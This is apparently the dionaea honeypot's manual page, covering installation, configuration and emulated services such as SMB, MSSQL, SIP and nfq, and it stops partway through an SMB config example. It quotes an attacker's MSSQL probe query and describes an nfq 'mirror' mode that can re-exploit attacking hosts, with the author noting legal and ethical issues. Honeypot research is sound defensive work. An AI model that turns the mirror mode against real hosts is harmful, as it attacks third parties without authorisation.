1DIONAEA(1) dionaea DIONAEA(1)
2
3
4
6 dionaea - dionaea Documentation
7
8 Dionaea is meant to be a nepenthes successor, embedding python as
9 scripting language, using libemu to detect shellcodes, supporting ipv6
10 and tls
11
12 WARNING:
13 The documentation is work in progress.
14
15 Content:
16
18 How it works
19 dionaea intention is to trap malware exploiting vulnerabilities exposed
20 by services offerd to a network, the ultimate goal is gaining a copy of
21 the malware.
22
23 Security
24 As Software is likely to have bugs, bugs in software offering network
25 services can be exploitable, and dionaea is software offering network
26 services, it is likely dionaea has exploitable bugs.
27
28 Of course we try to avoid it, but if nobody would fail when trying
29 hard, we would not need software such as dionaea.
30
31 So, in order to minimize the impact, dionaea can drop privileges, and
32 chroot.
33
34 To be able to run certain actions which require privileges, after dion‐
35 aea dropped them, dionaea creates a child process at startup, and asks
36 the child process to run actions which require elevated privileges.
37 This does not guarantee anything, but it should be harder to get gain
38 root access to the system from an unprivileged user in a chroot envi‐
39 ronment.
40
41 Network Connectivity
42 Given the softwares intented use, network io is crucial. All network io
43 is within the main process in a so called non-blocking manner. To
44 understand nonblocking, imagine you have many pipes infront of you, and
45 these pipes can send you something, and you can put something into the
46 pipe. If you want to put something into a pipe, while it is crowded,
47 you’d have to wait, if you want to get something from a pipe, and there
48 is nothing, you’d have to wait too. Doing this pipe game non-blocking
49 means you won’t wait for the pipes to be write/readable, you’ll get
50 something off the pipes once data arrives, and write once the pipe is
51 not crowded. If you want to write a large chunk to the pipe, and the
52 pipe is crowded after a small piece, you note the rest of the chunk you
53 wanted to write, and wait for the pipe to get ready.
54
55 DNS resolves are done using libudns, which is a neat non-blocking dns
56 resolving library with support for AAAA records and chained cnames. So
57 much about non-blocking.
58
59 dionaea uses libev to get notified once it can act on a socket, read or
60 write.
61
62 dionaea can offer services via tcp/udp and tls for IPv4 and IPv6, and
63 can apply rate limiting and accounting limits per connections to tcp
64 and tls connections - if required.
65
67 At the time of writing the best choice to install dionaea on a server
68 is to use Ubuntu 14.04, but below you can find how to install it (from
69 source) on other distributions/operating systems.
70
71 Basic stuff
72 Download the source code
73 You can download the source code from the release page or by using the
74 git command.
75
76 git clone https://github.com/DinoTools/dionaea.git
77 cd dionaea
78
79 Arch Linux
80 Packages for dionaea are available from the Arch User Repository (AUR).
81 Use a package manager like yaourt that can handle and install packages
82 from the AUR.
83
84 Before you start install the required build tools.
85
86 $ yaourt -S base-devel
87
88 After the requirements have been installed successfully you can install
89 dionaea. This will checkout the latest sources from the git reposi‐
90 tory, run the build process and install the package.
91
92 $ yaourt -S dionaea-git
93
94 After the installation has been completed you may want to edit the con‐
95 fig file /etc/dionaea/dionaea.conf. If everything looks fine the dion‐
96 aea service can bee started by using the following command.
97
98 $ sudo systemctl start dionaea
99
100 The log files and everything captured can be found in the directory
101 /var/lib/dionaea/.
102
103 Ubuntu 16.04
104 From Source
105 Before you start download the source code of dionaea.
106
107 Install required build dependencies before configuring and building
108 dionaea. (‘ttf-liberation’ required to ‘util/gnuplotsql.py’)
109
110 sudo apt-get install \
111 autoconf \
112 automake \
113 build-essential \
114 check \
115 cython3 \
116 libcurl4-openssl-dev \
117 libemu-dev \
118 libev-dev \
119 libglib2.0-dev \
120 libloudmouth1-dev \
121 libnetfilter-queue-dev \
122 libnl-3-dev \
123 libpcap-dev \
124 libssl-dev \
125 libtool \
126 libudns-dev \
127 python3 \
128 python3-dev \
129 python3-bson \
130 python3-yaml \
131 ttf-liberation
132
133 After all dependencies have been installed successfully run autreconf
134 to build or rebuild the build scripts.
135
136 autoreconf -vi
137
138 Run configure to configure the build scripts.
139
140 ./configure \
141 --disable-werror \
142 --prefix=/opt/dionaea \
143 --with-python=/usr/bin/python3 \
144 --with-cython-dir=/usr/bin \
145 --with-ev-include=/usr/include/ \
146 --with-ev-lib=/usr/lib \
147 --with-emu-lib=/usr/lib/libemu \
148 --with-emu-include=/usr/include \
149 --with-nl-include=/usr/include/libnl3 \
150 --with-nl-lib=/usr/lib
151
152 Now you should be able to run make to build and run make install to
153 install the honeypot.
154
155 make
156 sudo make install
157
158 The new honeypot can be found in the directory /opt/dionaea.
159
160 Ubuntu 14.04
161 Package based
162 Nightly packages are provided in a Personal Package Archive (PPA).
163 Before you start you should update all packages to get the latest secu‐
164 rity updates.
165
166 $ sudo apt-get update
167 $ sudo apt-get dist-upgrade
168
169 First of all install the tools to easily manage PPA resources.
170
171 $ sudo apt-get install software-properties-common
172
173 After the required tools have been installed you can add the PPA and
174 update the package cache.
175
176 $ sudo add-apt-repository ppa:honeynet/nightly
177 $ sudo apt-get update
178
179 If everything worked without any errors you should be able to install
180 the dionaea package.
181
182 $ sudo apt-get install dionaea
183
184 After the installation has been completed you may want to edit the con‐
185 fig file /etc/dionaea/dionaea.conf. If everything looks fine the dion‐
186 aea service can bee started by using the following command.
187
188 $ sudo service dionaea start
189
190 The log files can be found in the directory /var/log/dionaea/ and
191 everything else captured and logged by the honeypot can be found in the
192 directory /var/lib/dionaea/.
193
194 From Source
195 Before you start download the source code of dionaea.
196
197 Install required build dependencies before configuring and building
198 dionaea.
199
200 $ sudo apt-get install \
201 autoconf \
202 automake \
203 build-essential \
204 check \
205 cython3 \
206 libcurl4-openssl-dev \
207 libemu-dev \
208 libev-dev \
209 libglib2.0-dev \
210 libloudmouth1-dev \
211 libnetfilter-queue-dev \
212 libnl-dev \
213 libpcap-dev \
214 libssl-dev \
215 libtool \
216 libudns-dev \
217 python3 \
218 python3-dev \
219 python3-bson \
220 python3-yaml
221
222 After all dependencies have been installed successfully run autreconf
223 to build or rebuild the build scripts.
224
225 autoreconf -vi
226
227 Run configure to configure the build scripts.
228
229 ./configure \
230 --disable-werror \
231 --prefix=/opt/dionaea \
232 --with-python=/usr/bin/python3 \
233 --with-cython-dir=/usr/bin \
234 --with-ev-include=/usr/include \
235 --with-ev-lib=/usr/lib \
236 --with-emu-lib=/usr/lib/libemu \
237 --with-emu-include=/usr/include \
238 --with-nl-include=/usr/include/libnl3 \
239 --with-nl-lib=/usr/lib
240
241 Now you should be able to run make to build and run make install to
242 install the honeypot.
243
244 make
245 sudo make install
246
247 The new honeypot can be found in the directory /opt/dionaea.
248
249 3rd-party packages
250 The packages below are 3rd party provided, which is appreciated. If
251 you have compiled a package for your own distribution, just send me the
252 link or make a pull request.
253
255 If you want to change the software, it is really important to under‐
256 stand how it works, therefore please take the time to how it works.
257 dionaea.cfg is the main configuration file. In the example below you
258 can see the default configuration. dionaea.cfg.INDENT 0.0
259
260 [dionaea]
261 download.dir=/var/lib/dionaea/binaries/
262 modules=curl,python,nfq,emu,pcap
263 processors=filter_streamdumper,filter_emu
264
265 listen.mode=getifaddrs
266 # listen.addresses=127.0.0.1
267 # listen.interfaces=eth0,tap0
268
269 # Country
270 # ssl.default.c=GB
271 # Common Name/domain name
272 # ssl.default.cn=
273 # Organization
274 # ssl.default.o=
275 # Organizational Unit
276 # ssl.default.ou=
277
278 [logging]
279 default.filename=/var/log/dionaea/dionaea.log
280 default.levels=all
281 default.domains=*
282
283 errors.filename=/var/log/dionaea/dionaea-errors.log
284 errors.levels=warning,error
285 errors.domains=*
286
287 [processor.filter_emu]
288 name=filter
289 config.allow.0.protocols=smbd,epmapper,nfqmirrord,mssqld
290 next=emu
291
292 [processor.filter_streamdumper]
293 name=filter
294 config.allow.0.types=accept
295 config.allow.1.types=connect
296 config.allow.1.protocols=ftpctrl
297 config.deny.0.protocols=ftpdata,ftpdatacon,xmppclient
298 next=streamdumper
299
300 [processor.streamdumper]
301 name=streamdumper
302 config.path=/var/lib/dionaea/bistreams/%Y-%m-%d/
303
304 [processor.emu]
305 name=emu
306 config.limits.files=3
307 #512 * 1024
308 config.limits.filesize=524288
309 config.limits.sockets=3
310 config.limits.sustain=120
311 config.limits.idle=30
312 config.limits.listen=30
313 config.limits.cpu=120
314 #// 1024 * 1024 * 1024
315 config.limits.steps=1073741824
316
317 [module.nfq]
318 queue=2
319
320 [module.nl]
321 # set to yes in case you are interested in the mac address of the remote (only works for lan)
322 lookup_ethernet_addr=no
323
324 [module.python]
325 imports=dionaea.log,dionaea.services,dionaea.ihandlers
326 sys_paths=default
327 service_configs=/etc/dionaea/services-enabled/*.yaml
328 ihandler_configs=/etc/dionaea/ihandlers-enabled/*.yaml
329
330 [module.pcap]
331 any.interface=any
332
333
334
335 dionaea
336 download.dir
337 Global download directory used by some ihandlers.
338
339 listen.mode:
340 There are basically three modes how dionaea can bind the services to
341 IP addresses.
342
343 ·
344
345 getifaddrs - auto
346 This will get a list of all IP addresses of all available
347 interfaces and bind the services to each IP. It is also
348 possible to specify a list of interfaces to use by using
349 the listen.interfaces perameter.
350
351 ·
352
353 manual - your decision
354 In this mode you have to specify an additional parameter
355 listen.addresses. This is a comma separated list of IP
356 addresses dionaea should bind the services to.
357
358 ·
359
360 nl, will require a list of interfaces
361 You have to specify a comma separated list of interfaces
362 names with the listen.interfaces parameter. If an IP
363 address is added to an interfaces or removed from an inter‐
364 face dionaea will lunch or stop all services for this IP.
365
366 modules
367 Comma separated list of modules.
368
369 processors
370 Comma separated list of processors.
371
372 ssl.default.c
373 Two letter id of the Country.
374
375 ssl.default.cn
376 The Common Name/domain name of the generated SSL/TLS certificate.
377
378 ssl.default.o
379 The Organization name.
380
381 ssl.default.ou
382 The name of the Organizational Unit.
383
384 Logging
385 dionaea has a general application log. This logs are ment to be used
386 for debugging and to track errors. It is not recommended to analyse
387 this files to track attacks.
388
389 filename
390 The filename of the logfile.
391
392 levels
393 Only log messages that match the specified log level get logged to
394 the logfile.
395
396 Available log levels:
397
398 · debug
399
400 · info
401
402 · warning
403
404 · error
405
406 · critical
407
408 · all = Special log level including all log levels
409
410 Examples: Log only messages with level warning and error.INDENT 0.0
411
412 errors.levels=warning,error
413 Log all log messages but exclude messages with log level
414 debug.INDENT 0.0
415
416 errors.levels=all,-debug
417
419 Only log messages in a specified domain.
420
421 Modules
422 Only modules specified by the modules value in the dionaea section are
423 loaded during the start up.
424
425 Every module might have its own config section with additional config
426 parameters. The section name consists of the prefix module and the
427 module name speratated by a dot(.).
428
429 See the module/index documentation to find more information on how to
430 configure the modules.
431
432 Processors
433 The specified processors will be used as an entry point in the process‐
434 ing pipeline. In most cases the initial processor will be a filter
435 processor <processor/filter>. The next processor in the pipeline is
436 specified by the next parameter.
437
438 See the processor/index documentation to find more information on how
439 to configure the processors.
440
442 The software has some flags you can provide at startup, the -h flag
443 shows the help, the -H includes the default values.
444
445 $ /opt/dionaea/bin/dionaea -H
446 -c, --config=FILE use FILE as configuration file
447 Default value/behaviour: /opt/dionaea/etc/dionaea/dionaea.cfg
448 -D, --daemonize run as daemon
449 -g, --group=GROUP switch to GROUP after startup (use with -u)
450 Default value/behaviour: keep current group
451 -G, --garbage=[collect|debug] garbage collect, usefull to debug memory leaks,
452 does NOT work with valgrind
453 -h, --help display help
454 -H, --large-help display help with default values
455 -l, --log-levels=WHAT which levels to log, valid values
456 all, debug, info, message, warning, critical, error
457 combine using ',', exclude with - prefix
458 -L, --log-domains=WHAT which domains use * and ? wildcards, combine using ',',
459 exclude using -
460 -u, --user=USER switch to USER after startup
461 Default value/behaviour: keep current user
462 -p, --pid-file=FILE write pid to file
463 -r, --chroot=DIR chroot to DIR after startup
464 Default value/behaviour: don't chroot
465 -V, --version show version
466 -w, --workingdir=DIR set the process' working dir to DIR
467 Default value/behaviour: /opt/dionaea
468
469 examples:
470 # dionaea -l all,-debug -L '*'
471 # dionaea -l all,-debug -L 'con*,py*'
472 # dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/var/run/dionaea.pid
473
475 A list of applications and tools to collect information exported by
476 dionaea.
477
478 DTAG Community Honeypot Project
479 The DTAG Community Honeypot Project has been started in 2010 by a small
480 group of enthusiasts of the Deutsche Telekom. They are maintaining
481 T-Pot a Multi-Honeypot Platform. It is based on well established hon‐
482 eypots including dionaea.
483
484 · Website: DTAG Community Honeypot Project
485
486 · Status: active
487
488 DionaeaFR
489 DionaeaFR is a web-frontend to display attack information. It uses the
490 SQLite database provided by the log_sqlite ihandler.
491
492 · Website: DionaeaFR
493
494 · Status: unmaintained since 2014
495
496 DIY with log_json
497 You can use the log_json incident handler in combination with an ELK
498 stack to collect, aggregate and visualize attack information.
499
500 · Website: ELK stack
501
502 · Status: active
503
504 Modern Honey Network(mhn)
505 A tool to deploy honeypots, collect attack information and display
506 aggregated statistics.
507
508 · Website: Modern Honey Network
509
510 · Status: active, but deploys an pre 0.2(2014) version of dionaea by
511 default.
512
514 The subsections name is the name of the module dionaea will try to
515 load, most modules got rather simplistic names, the pcap module will
516 use libpcap, the curl module libcurl, the emu module libemu … The
517 python module is special, as the python module can load python scripts,
518 which offer services, and each services can have its own options.
519
520 List of available modules
521
522 curl
523 The curl module is used to transfer files from and to servers, it is
524 used to download files via http as well as submitting files to 3rd par‐
525 ties.
526
527 emu
528 The emu module is used to detect, profile and - if required - execute
529 shellcode.
530
531 pcap
532 The pcap module uses the libpcap library to detect rejected connection
533 attempts, so even if we do not accept a connection, we can use the
534 information somebody wanted to connect there.
535
536 python
537 The python module allows using the python interpreter in dionaea, and
538 allows controlling some scripts dionaea uses
539
541 Network services speak a certain language, this language is called pro‐
542 tocol. When we started deploying honeypots, you could trap worms just
543 by opening a single port, and wait for them to connect and send you an
544 url where you could download a copy of the worm. The service getting
545 attacked was the backdoor of the bagle mailworm, and it did not require
546 and interaction. Later on, the exploitations of real services got more
547 complex, and you had to reply something to the worm to fool him. Nowa‐
548 days worms use API to access services, before sending their payload.
549 To allow easy adjustments to the procotol, dionaea implements the pro‐
550 tocols in python. There is a glue between the network layer which is
551 done in the c programming language and the embedded python scripting
552 language, which allows using the non-blocking connections in python.
553 This has some benefits, for example we can use non-blocking tls connec‐
554 tions in python, and we even get rate limiting on them (if required),
555 where pythons own io does not offer such things. On the other hand, it
556 is much more comfortable to implement protocols in python than doing
557 the same in c.
558
559 List of available services
560
561 Black hole
562 The black hole module can be used to bind a service to a port. The
563 service does not respond to any submitted data. But the bistreams can
564 be used to create new modules.
565
566 Example config
567 services/blackhole.yaml.INDENT 0.0
568
569 - name: blackhole
570 config:
571 services:
572 # Telnet
573 - port: 23
574 protocol: tcp
575
576 # DNS
577 - port: 53
578 protocol: udp
579 - port: 53
580 protocol: tcp
581
582 # NTP
583 - port: 123
584 protocol: udp
585
586
587 EPMAP
588 Example config
589 services/epmap.yaml.INDENT 0.0
590
591 - name: epmap
592
593
594 FTP
595 Dionaea provives a basic ftp server on port 21, it can create directo‐
596 ries and upload and download files. From my own experience there are
597 very little automated attacks on ftp services and I’m yet to see some‐
598 thing interesting happening on port 21.
599
600 Example config
601 services/ftp.yaml.INDENT 0.0
602
603 - name: ftp
604 config:
605 root: /var/lib/dionaea/roots/ftp
606 response_messages:
607 welcome_msg: 220 DiskStation FTP server ready.
608
609
610 HTTP
611 Dionaea supports http on port 80 as well as https, but there is no code
612 making use of the data gathered on these ports. For https, the
613 self-signed ssl certificate is created at startup.
614
615 Configure
616 Example configuration:
617
618 - name: http
619 config:
620 root = "var/dionaea/wwwroot"
621
622 default_headers
623 Default header fields are send if none of the other header patterns
624 match.
625
626 global_headers
627 Global header fields are added to all response headers.
628
629 headers
630 List of header fields to be used in the response header. Only
631 applied if filename_pattern, status_code and methods match. The
632 first match in the list is used.
633
634 max_request_size
635 Maximum size in kbytes of the request. 32768 = 32MB
636
637 root
638 The root directory so serve files from.
639
640 Example config
641 services/http.yaml.INDENT 0.0
642
643 - name: http
644 config:
645 root: "/var/lib/dionaea/roots/www"
646 ports:
647 - 80
648 ssl_ports:
649 - 443
650 max_request_size: 32768 # maximum size in kbytes of the request (32MB)
651 global_headers:
652 - ["Server", "nginx"]
653 headers:
654 - filename_pattern: ".*\\.php"
655 headers:
656 - ["Content-Type", "text/html; charset=utf-8"]
657 - ["Content-Length", "{content_length}"]
658 - ["Connection", "{connection}"]
659 - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
660 # soap_enabled: false
661 template:
662 # set to true to enable template processing
663 # this feature requires jinja2 template engine http://jinja.pocoo.org/
664 enabled: false
665 file_extension: .j2
666 path: "/var/lib/dionaea/share/python/http/template/nginx"
667 templates:
668 autoindex:
669 filename: autoindex.html.j2
670 error_pages:
671 - filename: error.html.j2
672 # - filename: error/{code}.html.j2
673 # used to specify additional template values
674 values:
675 # full_name: nginx/1.1
676
677
678 Additional examples
679 Set the Server response field.
680
681 - name: http
682 config:
683 global_headers:
684 - ["Server", "nginx"]
685
686 Define headers to use if the filename matches a pattern.
687
688 - name: http
689 config:
690 headers:
691 - filename_pattern: ".*\\.php"
692 headers:
693 - ["Content-Type", "text/html; charset=utf-8"]
694 - ["Content-Length", "{content_length}"]
695 - ["Connection", "{connection}"]
696 - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
697
698 Memache
699 Dionaea can emulate a very basic memcached server.
700
701 Configure
702 Example config
703 services/memcache.yaml.INDENT 0.0
704
705 - name: memcache
706
707
708 Mirror
709 Example config
710 services/mirror.yaml.INDENT 0.0
711
712 - name: mirror
713
714
715 MongoDB
716 This module add initial support to emulates a MongoDB server with the
717 dionaea honeypot. At the moment it is very limited and the functional‐
718 ity might be improved in one of the next releases.
719
720 Requirements
721 · bson module for Python 3
722
723 Example config
724 services/mongo.yaml.INDENT 0.0
725
726 - name: mongo
727
728
729 MQTT
730 Example config
731 services/mqtt.yaml.INDENT 0.0
732
733 - name: mqtt
734
735
736 MSSQL
737 This module implements the Tabular Data Stream protocol which is used
738 by Microsoft SQL Server. It listens to tcp/1433 and allows clients to
739 login. It can decode queries run on the database, but as there is no
740 database, dionaea can’t reply, and there is no further action. Typi‐
741 cally we always get the same query:
742
743 exec sp_server_info 1 exec sp_server_info 2 exec sp_server_info 500 select 501,NULL,1 where 'a'='A' select 504,c.name,c.description,c.definition from master.dbo.syscharsets c,master.dbo.syscharsets c1,master.dbo.sysconfigures f where f.config=123 and f.value=c1.id and c1.csid=c.id set textsize 2147483647 set arithabort on
744
745 Refer to the blog <‐
746 http://carnivore.it/2010/09/11/mssql_attacks_examined> for more infor‐
747 mation. Patches would be appreciated.
748
749 Example config
750 services/mssql.yaml.INDENT 0.0
751
752 - name: mssql
753
754
755 MySQL
756 This module implements the MySQL wire stream protocol - backed up by
757 sqlite as database. Please refer to 2011-05-15 Extending Dionaea <‐
758 http://carnivore.it/2011/05/15/extending_dionaea> for more information.
759
760 Example config
761 services/mysql.yaml.INDENT 0.0
762
763 - name: mysql
764 config:
765 databases:
766 information_schema:
767 path: ":memory:"
768 # example how to extend this
769 # just provide a databasename and path to the database
770 # the database can be altered by attackers, so ... better use a copy
771 # psn:
772 # path: "/path/to/cc_info.sqlite"
773
774
775 nfq
776 The python nfq script is the counterpart to the nfq module. While the
777 nfq module interacts with the kernel, the nfq python script takes care
778 of the required steps to start a new service on the ports. nfq can
779 intercept incoming tcp connections during the tcp handshake giving your
780 honeypot the possibility to provide service on ports which are not
781 served by default.
782
783 As dionaea can not predict which protocol will be spoken on unknown
784 ports, neither implement the protocol by itself, it will connect the
785 attacking host on the same port, and use the attackers server side pro‐
786 tocol implementation to reply to the client requests of the attacker
787 therefore dionaea can end up re?exploiting the attackers machine, just
788 by sending him the exploit he sent us.
789
790 The technique is a brainchild of Tillmann Werner, who used it within
791 his honeytrap <http://honeytrap.carnivore.it> honeypot. Legal bound‐
792 aries to such behaviour may be different in each country, as well as
793 ethical boundaries for each individual. From a technical point of view
794 it works, and gives good results. Learning from the best, I decided to
795 adopt this technique for dionaea. Besides the legal and ethical issues
796 with this approach, there are some technical things which have to be
797 mentioned
798
799 port scanning
800 If your honeypot gets port scanned, it would open a service for each
801 port scanned, in worst case you’d end up with offering 64k services
802 per ip scanned. By default you’d run out of fds at about 870 ser‐
803 vices offerd, and experience weird behaviour. Therefore the impact
804 of port scanning has to be limited. The kiss approach taken here is
805 a sliding window of throttle.window seconds size. Each slot in this
806 sliding window represents a second, and we increment this slot for
807 each connection we accept. Before we accept a connection, we check
808 if the sum of all slots is below throttle.limits.total, else we do
809 not create a new service. If the sum is below the limit, we check
810 if the current slot is below the slot limit too, if both are given,
811 we create a new service. If one of the condition fails, we do not
812 spawn a new service, and let nfqeueu process the packet. There are
813 two ways to process packets which got throttled:
814
815 · NF_ACCEPT (=1), which will let the packet pass the kernel, and as
816 there is no service listening, the packet gets rejected.
817
818 · NF_DROP (=0), which will drop the packet in the kernel, the remote
819 does not get any answer to his SYN.
820
821 I prefer NF_DROP, as port scanners such as nmap tend to limit their
822 scanning speed, once they notice packets get lost.
823
824 recursive-self-connecting
825 Assume some shellcode or download instructions makes dionaea to
826
827 · connect itself on a unbound port
828
829 · nfq intercepts the attempt
830
831 · spawns a service
832
833 · accepts the connection #1
834
835 · creates mirror connection for connection #1 by connecting the
836 remotehost (itself) on the same port #2
837
838 · accepts connection #2 as connection #3
839
840 · creates mirror connection for connection #3 by connecting the
841 remotehost (itself) on the same port #4
842
843 · …
844
845 Such recursive loop, has to be avoided for obvious reasons. There‐
846 fore dionaea checks if the remote host connecting a nfq mirror is a
847 local address using ‘getifaddrs’ and drops local connections.
848
849 So much about the known problems and workarounds …
850
851 If you read that far, you want to use it despite the techni‐
852 cal/legal/ethical problems. So … You’ll need iptables, and you’ll have
853 to tell iptables to enqueue packets which would establish a new connec‐
854 tion. I recommend something like this:
855
856 iptables -t mangle -A PREROUTING -i eth0 -p tcp -m socket -j ACCEPT
857 iptables -t mangle -A PREROUTING -i eth0 -p tcp --syn -m state --state NEW -j NFQUEUE --queue-num 5
858
859 Explanation:
860
861 1. ACCEPT all connections to existing services
862
863 2. enqueue all other packets to the NFQUEUE
864
865 If you have dionaea running on your NAT router, I recommend something
866 like:
867
868 iptables -t mangle -A PREROUTING -i ppp0 -p tcp -m socket -j ACCEPT
869 iptables -t mangle -A PREROUTING -i ppp0 -p tcp --syn -m state --state NEW -j MARK --set-mark 0x1
870 iptables -A INPUT -i ppp0 -m mark --mark 0x1 -j NFQUEUE
871
872 Explanation:
873
874 1. ACCEPT all connections to existing services in mangle::PREROUTING
875
876 2. MARK all other packets
877
878 3. if we see these marked packets on INPUT, queue them
879
880 Using something like:
881
882 iptables -A INPUT -p tcp --tcp-flags SYN,RST,ACK,FIN SYN -j NFQUEUE --queue-num 5
883
884 will enqueue /all/ SYN packets to the NFQUEUE, once you stop dionaea
885 you will not even be able to connect to your ssh daemon.
886
887 Even if you add an exemption for ssh like:
888
889 iptables -A INPUT -i eth0 -p tcp --syn -m state --state NEW --destination-port ! 22 -j NFQUEUE
890
891 dionaea will try to create a new service for /every/ incoming connec‐
892 tion, even if there is a service running already. As it is easy to
893 avoid this, I recommend sticking with the recommendation. Besides the
894 already mention throttle settings, there are various timeouts for the
895 nfq mirror service in the config. You can control how long the service
896 will wait for new connections (/timeouts.server.listen/), and how long
897 the mirror connection will be idle (/timeouts.client.idle/) and sustain
898 (/timeouts.client.sustain/).
899
900 PPTP
901 Example config
902 services/pptp.yaml.INDENT 0.0
903
904 - name: pptp
905 config:
906 # Cisco PIX
907 # firmware_revision: 4608
908 # hostname:
909 # vendor_name: Cisco Systems
910
911 # DrayTek
912 # firmware_revision: 1
913 # hostname: Vigor
914 # vendor_name: DrayTek
915
916 # Linux
917 # firmware_revision: 1
918 # hostname: local
919 # vendor_name: linux
920
921 # Windows
922 # firmware_revision: 0
923 # hostname:
924 # vendor_name: Microsoft
925
926 # MikroTik router
927 # firmware_revision: 1
928 # hostname: MikroTik
929 # vendor_name: MikroTik
930
931
932 SIP (VoIP)
933 This is a VoIP module for the honeypot dionaea. The VoIP protocol used
934 is SIP since it is the de facto standard for VoIP today. In contrast to
935 some other VoIP honeypots, this module doesn’t connect to an external
936 VoIP registrar/server. It simply waits for incoming SIP messages (e.g.
937 OPTIONS or even INVITE), logs all data as honeypot incidents and/or
938 binary data dumps (RTP traffic), and reacts accordingly, for instance
939 by creating a SIP session including an RTP audio channel. As sophisti‐
940 cated exploits within the SIP payload are not very common yet, the hon‐
941 eypot module doesn’t pass any code to dionaea’s code emulation engine.
942 This will be implemented if we spot such malicious messages. The main
943 features of the VoIP module are:
944
945 · Support for most SIP requests (OPTIONS, INVITE, ACK, CANCEL, BYE)
946
947 · Support for multiple SIP sessions and RTP audio streams
948
949 · Record all RTP data (optional)
950
951 · Set custom SIP username and secret (password)
952
953 · Set custom useragent to mimic different phone models
954
955 · Uses dionaea’s incident system to log to SQL database
956
957 Personalities
958 A personality defines how to handle a request. At least the ‘default’
959 personality MUST exist. The following options are available per person‐
960 ality.
961
962 serve
963 A list of IP addresses to use this personality for.
964
965 handle
966 List of SIP methods to handle.
967
968 SIP Users
969 You can easily add, change or remove users by editing the SQLite file
970 specified by the ‘users = “”’ parameter in the config file. All users
971 are specified in the users table.
972
973 username
974 Specifies the name of the user. This value is treated as regular
975 expression. See Python: Regular Expressions <‐
976 http://docs.python.org/py3k/library/re.html> for more information.
977
978 password
979 The password.
980
981 personality
982 The user is only available in the personality specified by this
983 value. You can define a personality in the config file.
984
985 pickup_delay_min
986 This is an integer value. Let the phone ring for at least this num‐
987 ber of seconds.
988
989 pickup_delay_max
990 This is an integer value. Maximum number of seconds to wait before
991 dionaea picks up the phone.
992
993 action
994 This value isn’t in use, yet.
995
996 sdp
997 The name of the SDP to use. See table ‘sdp’.
998
999 SDP
1000 All SDPs can be defined in the sdp table in the users database.
1001
1002 name
1003 Name of the SDP
1004
1005 sdp
1006 The value to use as SDP
1007
1008 The following values are available in the SDP definition.
1009
1010 {addrtype}
1011 Address type. (IP4 or IP6)
1012
1013 {unicast_address}
1014 RTP address
1015
1016 {audio_port}
1017 Dionaea audio port.
1018
1019 {video_port}
1020 Dionaea video port.
1021
1022 The following control parameters are available in the SDP definition.
1023
1024 [audio_port]…content…[/audio_port]
1025 The content is only available in the output if the audio_port value
1026 is set.
1027
1028 [video_port]…content…[/video_port]
1029 The content is only available in the output if the video_port value
1030 is set.
1031
1032 Example:
1033
1034 v=0
1035 o=- 1304279835 1 IN {addrtype} {unicast_address}
1036 s=SIP Session
1037 c=IN {addrtype} {unicast_address}
1038 t=0 0
1039 [audio_port]
1040 m=audio {audio_port} RTP/AVP 111 0 8 9 101 120
1041 a=sendrecv
1042 a=rtpmap:111 Speex/16000/1
1043 a=fmtp:111 sr=16000,mode=any
1044 a=rtpmap:0 PCMU/8000/1
1045 a=rtpmap:8 PCMA/8000/1
1046 a=rtpmap:9 G722/8000/1
1047 a=rtpmap:101 telephone-event/8000
1048 a=fmtp:101 0-16,32,36
1049 a=rtpmap:120 NSE/8000
1050 a=fmtp:120 192-193
1051 [/audio_port]
1052 [video_port]
1053 m=video {video_port} RTP/AVP 34 96 97
1054 c=IN {addrtype} {unicast_address}
1055 a=rtpmap:34 H263/90000
1056 a=fmtp:34 QCIF=2
1057 a=rtpmap:96 H263-1998/90000
1058 a=fmtp:96 QCIF=2
1059 a=rtpmap:97 H263-N800/90000
1060 [/video_port]
1061
1062 Example config
1063 services/sip.yaml.INDENT 0.0
1064
1065 - name: sip
1066 config:
1067 udp_ports:
1068 - 5060
1069 tcp_ports:
1070 - 5060
1071 tls_ports:
1072 - 5061
1073 users: "@LOCALESTATEDIR@/lib/dionaea/sipaccounts.sqlite"
1074 rtp:
1075 enable: true
1076 # how to dump the rtp stream
1077 # bistream = dump as bistream
1078 modes:
1079 - bistream
1080 - pcap
1081 pcap:
1082 path: "var/dionaea/rtp/{personality}/%Y-%m-%d/"
1083 filename: "%H:%M:%S_{remote_host}_{remote_port}_in.pcap"
1084 personalities:
1085 default:
1086 domain: "localhost"
1087 name: "softphone"
1088 personality: "generic"
1089 # next-server:
1090 # domain: "my-domain"
1091 # name: "my server"
1092 # personality: "generic"
1093 # serve: ["10.0.0.1"]
1094 # default_sdp: "default"
1095 # handle: ["REGISTER", "INVITE", "BYE", "CANCEL", "ACK"]
1096
1097 actions:
1098 bank-redirect:
1099 do: "redirect"
1100 params:
1101 play-hello:
1102 do: "play"
1103 params:
1104 file: "var/dionaea/.../file.ext"
1105
1106
1107 SMB
1108 The main protocol offerd by dionaea is SMB. SMB has a decent history of
1109 remote exploitable bugs, and is a very popular target for worms. dion‐
1110 aeas SMB implementation makes use of an python3 adapted version of
1111 scapy. As scapys own version of SMB was pretty limited, almost every‐
1112 thing but the Field declarations had to be rewritten. The SMB emulation
1113 written for dionaea is used by the mwcollectd <‐
1114 http://code.mwcollect.org> low interaction honeypot too. Besides the
1115 known attacks on SMB dionaea supports uploading files to smb shares.
1116 Adding new DCE remote procedure calls is a good start to get into dion‐
1117 aea code, you can use:
1118
1119 SELECT
1120 COUNT(*),
1121 dcerpcrequests.dcerpcrequest_uuid,
1122 dcerpcservice_name,
1123 dcerpcrequest_opnum
1124 FROM
1125 dcerpcrequests
1126 JOIN dcerpcservices ON(dcerpcrequests.dcerpcrequest_uuid == dcerpcservices.dcerpcservice_uuid)
1127 LEFT OUTER JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice )
1128 WHERE
1129 dcerpcserviceop_name IS NULL
1130 GROUP BY
1131 dcerpcrequests.dcerpcrequest_uuid,dcerpcservice_name,dcerpcrequest_opnum
1132 ORDER BY
1133 COUNT(*) DESC;
1134
1135 to identify potential usefull targets of unknown dcerpc calls using the
1136 data you gathered and stored in your logsql database. Patches are
1137 appreciated.
1138
1139 Example config
1140 services/smb.yaml.INDENT 0.0
1141
1142 - name: smb
1143 config:
1144
1145 ## Generic setting ##
1146
1147 # 1:"Windows XP Service Pack 0/1",
1148 # 2:"Windows XP Service Pack 2",
1149 # 3:"Windows XP Service Pack 3",
